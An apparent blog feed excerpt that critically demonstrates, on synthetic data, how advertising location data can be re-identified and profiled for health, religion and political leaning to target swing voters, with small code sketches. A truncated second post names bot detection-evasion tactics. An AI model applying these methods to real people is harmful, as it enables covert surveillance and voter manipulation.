    href=&quot;/static/ab7a4e3620e600c138b0baa1517e188b/108f8/colocation.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 66.89189189189189%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAIAAAAmMtkJAAAACXBIWXMAABJ0AAASdAHeZh94AAACbUlEQVQoz0XSWVPjRhQF4Pn//ySVh1ATCB6MZCxZ6m5JvakXLS3LktFm2Q5LjAkwNQwkTuXhPH4P99zz5f39/e3t9fHwcHh5Oh6etuOm7Zqha8dxGMah3w/9uBnbdjM0fdc8/vXw/HI8/n14+/76Ab985PDwoCSiCRVRQDTHMQDAxcDGyWROzhieEjDx3WkILKQu+12j83izb054s9tGwhNowYIbIkOhQ5lQ5tmSz3hkBaWrO5bUlDDfQzZXEWJO3WcnPD6O0dpVdAaWDssYoSBHFrZ/C6Al5QwYl7Sw3fPMMJY6i9XkWp3nXXrCu/ttBO3Ym0ZiCu1r5F/FCtAc6mjKElfpiEvkpbZpw/wWhoUzp9NVXX7iHz/e7+7+xNYUz/+YhxcYuywRWPhe5C/gLEQzmQlKcMQBoTPGLqLUdp15tcw/8dPhadiPQQwF8YSBrKDpKseCIAIDBgPkaBYWhWz6fFlA1X7Fw7Ufe6vb9Sc+Hp83u44bpBXgayc1SOTSk99CZdMYeMJziFUIJJVwFjRU0UKgCbusmtXp5vv7HU0jZQAxc2UICRyc+awMkwTEGolUgAB67pWPr4LmEncX8+XZctD/tb0dAxzECdPsBlKIPv7BXVY7AbZp4UiFZBIL6CDnLNC/ouL3GZusd8kJb++6uIJpJnl+jvW3pJKJhoxPE8VxDXkFqiJa8dltqZYlvYnP7MBq/237I/u7XpuvWl3GdJKSc2bczBAe+fYNsUILBH5f6bRX9ZDfbjJsnCv+y/8jeXl9Nh1PTFwUpsx4Y3iZhlVjlpmsU5YXad2usjpZ90W5EWWnqzEe/5nnT6/YkQlViSnUAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;colocation&quot;
        title=&quot;colocation&quot;
        src=&quot;/static/ab7a4e3620e600c138b0baa1517e188b/fcda8/colocation.png&quot;
        srcset=&quot;/static/ab7a4e3620e600c138b0baa1517e188b/12f09/colocation.png 148w,
/static/ab7a4e3620e600c138b0baa1517e188b/e4a3f/colocation.png 295w,
/static/ab7a4e3620e600c138b0baa1517e188b/fcda8/colocation.png 590w,
/static/ab7a4e3620e600c138b0baa1517e188b/108f8/colocation.png 777w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The map above shows two devices co-locating at a farm café and in a residential area; it would be reasonable to assume that the owners of these devices have some kind of relationship.&lt;/p&gt;
&lt;h2&gt;Behavioural Profiling&lt;/h2&gt;
&lt;p&gt;At present, our raw bidstream data is structured as follows:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/9cafe0e79eacdaf5a1f3d23eddb63f3a/40040/raw.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 70.94594594594594%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAABJ0AAASdAHeZh94AAAB6klEQVQoz1WTiY6qMBSG5/1fzlFZFCilRSnCsIOD43Y/wBtjE5Jytn858PV4PK7X62M+l8tlvIxT5G86t9ttGIbb/f58Ps/nM1kuBJ//zxcvJLhRt1qtrO32dDp9r76ljJgiw9B13SzLokhuNhuTJNvt1hjD6KmZh6JlttI6z7NTmmqt67oiOP7+ChEcDoe+78JQaB1rrbgURfnR3PeDCMPUJGlqPM8Dn2DXtvv9XilFMyxo9n1/B5c8fzXfZ1Vd1/mBOB7iONZU5FlGsGlq27aVVmVZOq4jZRgEQRRFi/JXM+B930cqymBtjAhENjeDHPg+tBmN7Egp5qJ5semN3DSNZdlKRYzHmyRJJiOGwbas/W5XVRVBy7I26zVCuq7/QG7bFm0/OZZl8SGmejaih+QxSfqu00pBIZ68rMdx/DAMVbbtxDGWq/V6UxQFQTxnf0CVZUFQCOE6mGD/zNk3bZDZ0M+0q9MictFCEOfJBsEknlUbk8Looxlkz/OT4xHZjusuyG3TuK6DkSyS/fm453l7z2vn0e/mqiynPacGWVJKMCfNXcdueMVe1AoRSjyQsq7qj2bkIYk9GZMwHCIT7bphNxgJbbIyZH7I5W3YC7mqKGLPqGZ4U9fzl9MCi1R+mSRBESfiM6rn7D/vUgfzlkBwrwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;raw&quot;
        title=&quot;raw&quot;
        src=&quot;/static/9cafe0e79eacdaf5a1f3d23eddb63f3a/fcda8/raw.png&quot;
        srcset=&quot;/static/9cafe0e79eacdaf5a1f3d23eddb63f3a/12f09/raw.png 148w,
/static/9cafe0e79eacdaf5a1f3d23eddb63f3a/e4a3f/raw.png 295w,
/static/9cafe0e79eacdaf5a1f3d23eddb63f3a/fcda8/raw.png 590w,
/static/9cafe0e79eacdaf5a1f3d23eddb63f3a/40040/raw.png 616w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;While real-world bidstream data purchased from brokers often contains a far richer set of attributes, our synthetic dataset serves as an approximation of the kind of sensitive information being shared. It includes timestamped latitude/longitude coordinates, device IDs (which, in this case, act as a proxy for MAIDs), and app data, all of which are commonly found in programmatic advertising bidstreams. This simplified version still demonstrates the potential risks associated with such data, even without the full breadth of fields available in commercial datasets.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/b49cc41b0263d097d8632e5708c0bb8e/73fd0/real.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 33.108108108108105%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAABJ0AAASdAHeZh94AAABUklEQVQY0z2O6W6CUBCFaZq0TUUUsHKpbLLviyA7tj/ERhF4Bd/B9086JLbJycmXe8/MHOzSdf0wTOqHa//wf+j/1F3BHl/DOJ5Op/v9jr1SPIG2OMnMKTSn2dkELEGzOMUQq0/w+cRosebwKTBlSEZ4enmvyhJbcbIVZqafyFbgxYXhxqLuAthhagZ7cN3fb7ZmkNZunPOKpdihpLsLGrVti5FIsILE2eWy6cMKw4s5xXKiDOZ1dxckpeoljKBqTmSFKYBkeGtemS0/jscjRrOSHxdRVsOYE6XgvGr7SRGmFZyN88baFaxkuFEGmY1sqnbISjpOrqfL7xQSdQ86wxNs5VWHYqWt4ctmwCk21OE0b8EIguZC4SUjIFFbIvH5jWiaBov3WdV8VfWhqJr68J3mZV7Ul66/9uP50nf92P6cs6KsmgMoKyqI5WXtB9HtdvsFpQZMdtneM8sAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;real&quot;
        title=&quot;real&quot;
        src=&quot;/static/b49cc41b0263d097d8632e5708c0bb8e/fcda8/real.png&quot;
        srcset=&quot;/static/b49cc41b0263d097d8632e5708c0bb8e/12f09/real.png 148w,
/static/b49cc41b0263d097d8632e5708c0bb8e/e4a3f/real.png 295w,
/static/b49cc41b0263d097d8632e5708c0bb8e/fcda8/real.png 590w,
/static/b49cc41b0263d097d8632e5708c0bb8e/73fd0/real.png 793w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;As previously discussed, there are companies that offer MAID data enriched with personally identifiable information (PII), allowing direct linkage between device activity and individual users. However, even without direct PII access, those familiar with OSINT (Open Source Intelligence) methodologies will recognise that public records can be leveraged to approximate device ownership.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Residential Identification&lt;/strong&gt;: By cross-referencing observed home locations with publicly available property records, electoral rolls, or tenancy databases, one can infer probable owners or tenants of a given residential address.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Workplace Identification&lt;/strong&gt;: Similarly, using lat/lon coordinates observed during working hours, we can reverse engineer workplaces by matching frequent locations to known business addresses.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This approach effectively converts anonymous geospatial data into actionable intelligence, bridging the gap between digital footprints and real-world identities. While this process does not provide a definitive link between a MAID and a specific individual, it significantly narrows the field of potential owners, making re-identification highly feasible when combined with other datasets.&lt;/p&gt;
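&lt;p&gt;The workplace step amounts to a nearest-neighbour lookup: take an inferred location and find the closest known premises. In the sketch below the premises list is invented, distances use an equirectangular approximation that is adequate over a few hundred metres, and anything beyond the hypothetical &lt;code&gt;max_m&lt;/code&gt; threshold is treated as no match.&lt;/p&gt;

```python
import math
from typing import List, Optional, Tuple

EARTH_RADIUS_M = 6_371_000

Premises = Tuple[str, float, float]  # (name, lat, lon)


def approx_distance_m(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Equirectangular approximation; fine for short urban distances."""
    x = math.radians(lon2 - lon1) * math.cos(math.radians((lat1 + lat2) / 2))
    y = math.radians(lat2 - lat1)
    return EARTH_RADIUS_M * math.hypot(x, y)


def nearest_premises(
    lat: float, lon: float, premises: List[Premises], max_m: float = 75.0
) -> Optional[str]:
    """Return the name of the closest premises within max_m metres, else None."""
    if not premises:
        return None
    name, dist = min(
        ((p_name, approx_distance_m(lat, lon, p_lat, p_lon)) for p_name, p_lat, p_lon in premises),
        key=lambda item: item[1],
    )
    return name if max_m >= dist else None
```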
&lt;p&gt;Using just the fields in our synthetic data, we can begin to profile individual devices and infer characteristics about their likely owners. While this is a simplified model, it illustrates how even basic bidstream data can reveal sensitive personal attributes, raising concerns about how such data can be exploited when combined with additional sources.&lt;/p&gt;
&lt;p&gt;Some examples of inferences that can be drawn from movement patterns and app interactions include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Occupation &amp;#x26; Income Level&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Work location and commuting patterns can distinguish between blue-collar and white-collar roles.&lt;/li&gt;
&lt;li&gt;The types of retail and leisure locations visited can suggest approximate disposable income (e.g., high-end retailers vs. discount stores).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Health Indicators&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Frequent visits to pharmacies, clinics, or hospitals may indicate chronic health conditions.&lt;/li&gt;
&lt;li&gt;Fast food consumption patterns, fitness tracker usage, or presence at gyms could suggest dietary habits and exercise routines.&lt;/li&gt;
&lt;li&gt;Regular visits to e-cigarette shops or tobacco stores could indicate smoking habits.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Age Estimation&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Dating app usage, social media behaviour, and visits to nightclubs or youth-centric venues can suggest younger demographics.&lt;/li&gt;
&lt;li&gt;Conversely, regular attendance at locations associated with senior services, medical centres, or quieter suburban amenities may indicate an older demographic.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Religious &amp;#x26; Ethnic Affiliation&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Visits to places of worship (churches, mosques, temples, synagogues) can reveal religious beliefs.&lt;/li&gt;
&lt;li&gt;Certain grocery stores, restaurants, or cultural centres may provide proxies for ethnic background, particularly in areas with strong community ties.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With even a basic dataset, one can begin to infer political inclinations based on lifestyle, income, and demographic factors. While these are broad statistical generalisations rather than precise classifications, they demonstrate how a more sophisticated analysis could refine these assumptions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Income Level &amp;#x26; Ideology&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Lower-income households are often more likely to support liberal policies, reflecting their priorities on social welfare and taxation.&lt;/li&gt;
&lt;li&gt;Higher-income households may lean conservative based on fiscal priorities and tax incentives.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Age &amp;#x26; Political Views&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Younger individuals tend to lean more progressive, aligning with policies on climate change, social justice, and economic reform.&lt;/li&gt;
&lt;li&gt;Older demographics generally show more conservative voting patterns, particularly on economic and social stability issues.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Occupation &amp;#x26; Ideology&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Blue-collar workers may lean conservative, influenced by economic policies favouring job security and trade protections.&lt;/li&gt;
&lt;li&gt;White-collar professionals, particularly in urban settings, are often more liberal, favouring globalisation, tech policies, and corporate regulation.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Marital Status &amp;#x26; Political Preference&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Single individuals tend to lean more liberal, aligning with policies on social issues, housing affordability, and worker rights.&lt;/li&gt;
&lt;li&gt;Married couples are more likely to lean conservative, with a focus on economic stability, family policies, and tax benefits.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Political modelling&lt;/h2&gt;
&lt;p&gt;These estimates are inherently probabilistic, drawing on broad trends in social science and political research, yet even approximate models of behaviour can be pivotal in tightly contested elections with millions of voters. In the UK, where campaign spending is capped, maximising the probability that adverts or videos reach the most likely swing voters is essential. With greater computational resources and enriched datasets, companies could refine these models considerably further.&lt;/p&gt;
&lt;p&gt;Building on these assumptions, we can score each device in our fictional dataset and rank it along a spectrum from most conservative to most liberal. By associating behavioural indicators with ideological tendencies, we can construct a rough ideological map of our simulated population. The ability to identify and target swing voters has been critical in U.S. elections and played a major role in the operations of firms such as Cambridge Analytica, whose core offering revolved around identifying and influencing undecided or persuadable voters.&lt;/p&gt;
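&lt;p&gt;The scoring step can be sketched as a simple additive model. This is a hypothetical illustration, not the model used for this article. The feature names (highIncome, olderAge and so on) and the unit weights are assumptions that loosely mirror the heuristics listed earlier. Positive weights push a device towards the conservative end and negative weights towards the liberal end.&lt;/p&gt;

```javascript
// Hypothetical weights loosely mirroring the heuristics above (illustrative only).
// Positive values push a device towards the "conservative" end of the spectrum,
// negative values towards the "liberal" end.
const WEIGHTS = {
  highIncome: 1,
  lowIncome: -1,
  olderAge: 1,
  youngerAge: -1,
  blueCollar: 1,
  whiteCollarUrban: -1,
  married: 1,
  single: -1,
};

// Score each device by summing the weights of the boolean features it exhibits,
// then sort from most conservative (highest score) to most liberal (lowest score).
function rankDevices(devices, weights = WEIGHTS) {
  return devices
    .map((device) => ({
      maid: device.maid,
      score: Object.entries(weights).reduce(
        (sum, [feature, weight]) => sum + (device.features[feature] ? weight : 0),
        0
      ),
    }))
    .sort((a, b) => b.score - a.score);
}

// Example with three synthetic devices (identifiers are made up).
const ranked = rankDevices([
  { maid: "device-a", features: { youngerAge: true, single: true, whiteCollarUrban: true } },
  { maid: "device-b", features: { olderAge: true, married: true, blueCollar: true } },
  { maid: "device-c", features: { olderAge: true, single: true } },
]);
console.log(ranked.map((d) => `${d.maid}: ${d.score}`).join(", "));
// device-b: 3, device-c: 0, device-a: -3
```

&lt;p&gt;A more realistic model would presumably learn its weights from labelled data rather than setting them by hand. Hand-set weights simply make the mechanics visible.&lt;/p&gt;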
&lt;p&gt;According to our model, the most conservative device in our dataset belongs to an individual who exhibits a set of behaviours traditionally associated with right-leaning views. This person appears to be an older, presumably married man whose routine includes regular church attendance and frequent visits to a designated smoking area. His apparent employment at a car garage, combined with spending patterns indicative of a lower income bracket, further aligns him with demographic groups often linked to conservative voting. While our dataset is synthetic and lacks real-world verification, these markers provide a useful proxy for mapping ideological leanings.&lt;/p&gt;
&lt;p&gt;At the opposite end of the spectrum, our most liberal device appears to belong to a younger woman living in a house in multiple occupation (HMO). Her location and movement data suggest employment at a Pilates studio, and she regularly uses both a dating app and a fitness app. These behaviours, coupled with her urban lifestyle and flexible work patterns, align with characteristics often associated with left-leaning political preferences. While individual ideology is far more nuanced than any model can fully capture, the broad trends in our synthetic dataset reflect real-world correlations found in political and social research.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/2e963e7c93a608daee1f19c391454143/6c745/poldevice.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 39.86486486486486%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAABJ0AAASdAHeZh94AAABm0lEQVQY0x2P2XKiQAAA/f+f2dJordaCLjcMMwwzwxEuCWg4xGGVGONmS43Zl37r6urR7XY7/OEbvqm6Zl/Vr11Ztdu23pZZGGVxtA5QAtMy716SusiaXd33vG12TVu9vR9H9/u9qV9hjG2gUgjtECGim5ZiLufhswrTmcymji0QbSKLT8SBXmA7geGFpOmL0fV6ravCoSjQVYR1zDALAM19BAyPyhBMHWNJMiXe+O4aUh8CsICuRjxU1i+jYTjVTRHQR3aBEo3FhFCYQImIE0t4Qq5MqCAWK6syWk6iNfMYAL4q0p9ZHY/ehuGxSJFqxystUhG0bFMMHJk5oqb8IpaCmeT6FsrsqDWzCq9zi5aKWo7TOvn/vN2g8Q/iCLY+gcIMQQkz3c2wZilQWq4QYJ5rGupvtJLYPC8dNzNUpKVZ/i1vy8KYL0xDkNWZ52MQUsRM2ZRkW4dISHw9SF2XYIiBjQ1DmgJnLIBxkoff8uXyt9vvh+PQtt3pfOY9P51PD/K+j5OEd3zP+8vH5XB48IN3u/fzwI+7z3+fX/nAktQerGcaAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;poldevice&quot;
        title=&quot;poldevice&quot;
        src=&quot;/static/2e963e7c93a608daee1f19c391454143/fcda8/poldevice.png&quot;
        srcset=&quot;/static/2e963e7c93a608daee1f19c391454143/12f09/poldevice.png 148w,
/static/2e963e7c93a608daee1f19c391454143/e4a3f/poldevice.png 295w,
/static/2e963e7c93a608daee1f19c391454143/fcda8/poldevice.png 590w,
/static/2e963e7c93a608daee1f19c391454143/efc66/poldevice.png 885w,
/static/2e963e7c93a608daee1f19c391454143/6c745/poldevice.png 893w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Focusing on the middle 10% of our ideological spectrum, we can identify a subset of devices representing potential swing voters. By mapping their home locations, we can visualise geographic clusters where voting intentions are likely to be most fluid. In a real-world scenario, these areas would be of particular interest to political campaigns, as small shifts in voter sentiment within them could be decisive in a closely contested election. The ability to target advertising and messaging at these individuals with high precision underscores why even probabilistic models of behaviour hold significant strategic value.&lt;/p&gt;
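&lt;p&gt;Once every device has a numeric ideological score, selecting the middle 10% of the spectrum is a simple slicing operation. The sketch below is illustrative only. The function name middleSlice, the { maid, score } input shape and the rounding rule are assumptions, not part of the original analysis.&lt;/p&gt;

```javascript
// Return the devices whose scores fall in the central `fraction` of the ranking
// (0.1 = middle 10%). Input: array of { maid, score } objects, in any order.
function middleSlice(devices, fraction = 0.1) {
  // Sort a copy by score so the caller's array is left untouched.
  const sorted = [...devices].sort((a, b) => a.score - b.score);
  const n = sorted.length;
  if (n === 0) return [];
  // Keep at least one device; otherwise round to the nearest whole device.
  const size = Math.max(1, Math.round(n * fraction));
  const start = Math.floor((n - size) / 2);
  return sorted.slice(start, start + size);
}

// Example: 100 synthetic devices with scores 0 to 99, supplied in reverse order.
const devices = Array.from({ length: 100 }, (_, i) => ({ maid: `device-${99 - i}`, score: 99 - i }));
const swing = middleSlice(devices);
console.log(swing.map((d) => d.score).join(" "));
// 45 46 47 48 49 50 51 52 53 54
```

&lt;p&gt;Because the slice is positional, ties at its boundaries are broken by sort order. Thresholding on the score itself would be an alternative design.&lt;/p&gt;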
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/0ef5c9a9927f427d8f1a25f5b532ae1e/37523/swingvoters.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 102.02702702702702%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAIAAAAC64paAAAACXBIWXMAABJ0AAASdAHeZh94AAAD20lEQVQ4yz2TW2/jRBTH96vxwOOKByReeeUm7QcACYGQgAW0L7yAEGhBLVtaetuktyQNiXOzPbbH97FnxuOxYztJL0nTTUrbbbymG3Y0N4300/+cM//zYLFYjCdTHxtYOFSw7LhH3Gs5oYgd0Q4MwtCxUYWOhHBXJ6LMn7fZmmDt+NTM8/xBAS/yvM8DbPVE2ug4+5g0TE9owEPD1wyiHBol1wauJxmo3nOeieRPKVy1406+uIfPx+OAYj9S1aQBfJGaIDZNDe81SOXYqYpumbImCUw9Fsx0H4Y7IN3Q09Z/cH4/zrIR8kWBH0CmIUWLOxoPkBLJuiMTrCmDMhyUNL5vJXX39EgInxlJdxn2+dl5GHM7kMruFvAkT6qz2o6raMRRoNmzuOpnPT07lPimGBVza9v6w4jF18pFyvloEMjeAdAPbVjDpoB9kSDdc0DH3LNjMUwwzCog2e2F2y2yW7JWnFB4k/MkChDpVonaBrzpcstOdCdS40jXjLbvIxRAxFQl2JNITaRyxfkdJ8175cXiLs8HAQmQTLHcov/s0YPoREtHapwQRGWAhY5fKfZWJoB+E3PRYmWciUvlyWTKfCPGwMMyJorHbTuV7H4rTA0WdpWs0eZbVfi8u/6T6lZ8v0f6IhnAZc53d4soIgFsQiJS7sXUJAw0zLJNhTBVvOba6P33kkcfpN9+1UNt3QddVnIH3aXy1XxOONPMJrXbNHZJREKKvEDkgeLhmmv+xZ98On348PTrz7T2uhIe99ghehN2AfMs1g3FtZV+4MScJWkwOsGcE8h2W+MDKK/N3n5r+u47/m8/dJzyMdvwEvkeLir2chEMQsNuawgCvzkM1LTv9EeURwAPa/xUBqxk66tnjz4kP39ZF36tJxteKv9fsItpHGLX1zWiS1bHNCG1ZT+SWWjjkUBGgjo6kMNtb+WJBNbb2krVWXGHcn73+qsW+SD2PCQTYsaEo4CoBhDFioqa7XhLTktitqOmVXlS1YdHgOypTx8bSFjac3JxERPUMitddkSjbhxZPMQEqo5cs+xNNd03e6vBL99DXtJOqsd0U/Q2DHTv7aU9s5BF2BwALaxlWWGqeqo3MmKGvqpFR97qN8OPP+n/+J0G1qVBucvLkIKl8ng8LjrSpaqe7YO4FBOV4cLPXjakyQiTyNqSnsIvPgoff242/4akBZWai7QlXBxplgFVdDCEUPJd00E2Cr0oYoS5g6SvuLLeV1Uq+8yASoNgj1E6m82W/fzy9nY6vby5vp1eXF5dXU2n0/ls/mI2e1Gs+bx4vP73Zjq5vL6+mRT3m5si2AJ+BUHO8MTjTi+5AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;swingvoters&quot;
        title=&quot;swingvoters&quot;
        src=&quot;/static/0ef5c9a9927f427d8f1a25f5b532ae1e/fcda8/swingvoters.png&quot;
        srcset=&quot;/static/0ef5c9a9927f427d8f1a25f5b532ae1e/12f09/swingvoters.png 148w,
/static/0ef5c9a9927f427d8f1a25f5b532ae1e/e4a3f/swingvoters.png 295w,
/static/0ef5c9a9927f427d8f1a25f5b532ae1e/fcda8/swingvoters.png 590w,
/static/0ef5c9a9927f427d8f1a25f5b532ae1e/37523/swingvoters.png 720w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The analysis presented here, while based on a synthetic dataset, demonstrates just how revealing bidstream and MAID data can be when aggregated and analysed at scale. Even with a basic probabilistic model, we can infer broad ideological leanings, identify swing voters, and simulate how political campaigns, intelligence agencies, or commercial entities might exploit such data for targeted influence. When applied to real-world datasets, where enriched personal information is often available, the potential for invasive tracking and manipulation becomes even more alarming.&lt;/p&gt;
&lt;p&gt;The UK’s regulatory framework, particularly the UK GDPR, places legal obstacles in the way of widespread bidstream exploitation. However, legal restrictions do not always deter those with the resources and intent to operate in grey areas. The sheer volume of location data circulating in the advertising ecosystem makes it highly susceptible to misuse, whether by political operatives seeking to influence election outcomes, private intelligence firms conducting mass surveillance, or malicious actors engaging in coercion and profiling.&lt;/p&gt;
&lt;p&gt;This article has aimed to provide a practical look at how seemingly harmless individual bidstream events can be transformed into a powerful surveillance tool. As regulatory scrutiny lags behind the rapid evolution of ad-tech and data brokerage, the implications for privacy, democracy, and civil liberties remain profound.&lt;/p&gt;
&lt;p&gt;If nothing else, this should serve as a stark reminder: when you see an ad pop up on your phone, you may be not just a potential customer but also a data point in a far larger, more intricate system of influence and surveillance.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Calibrating a 3D Printed Delta Arm for Screen Interaction]]></title><description><![CDATA[Introduction The battle between disinformation spreaders, propagandists, and automated social media activity, and the algorithms designed to…]]></description><link>https://dfworks.com/blog/delta_arm/</link><guid isPermaLink="false">https://dfworks.com/blog/delta_arm/</guid><pubDate>Thu, 24 Oct 2024 12:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;The battle between disinformation spreaders, propagandists and operators of automated social media activity on one side, and the algorithms designed to detect and control them on the other, is an ongoing arms race. While many expect it to be easy to distinguish human behaviour from bots, the reality is far more complex.&lt;/p&gt;
&lt;p&gt;Through my research on forums like BlackHatWorld, I gained insight into how bot farmers and trolls evade detection. Techniques such as &lt;a href=&quot;https://www.blackhatworld.com/seo/does-anyone-have-an-undetectable-selenium-jar.962732/&quot;&gt;hex-editing chromedriver&lt;/a&gt; to alter browser fingerprints, and using &lt;a href=&quot;https://www.youtube.com/watch?v=X_pRsSM_sXQ&quot;&gt;device farms&lt;/a&gt; for physical and virtual automation, illustrate some of the tactics used to exert influence at scale while avoiding detection. These findings led me to explore whether emulating human behaviour with robotics could offer a cost-effective alternative for device automation at scale.&lt;/p&gt;
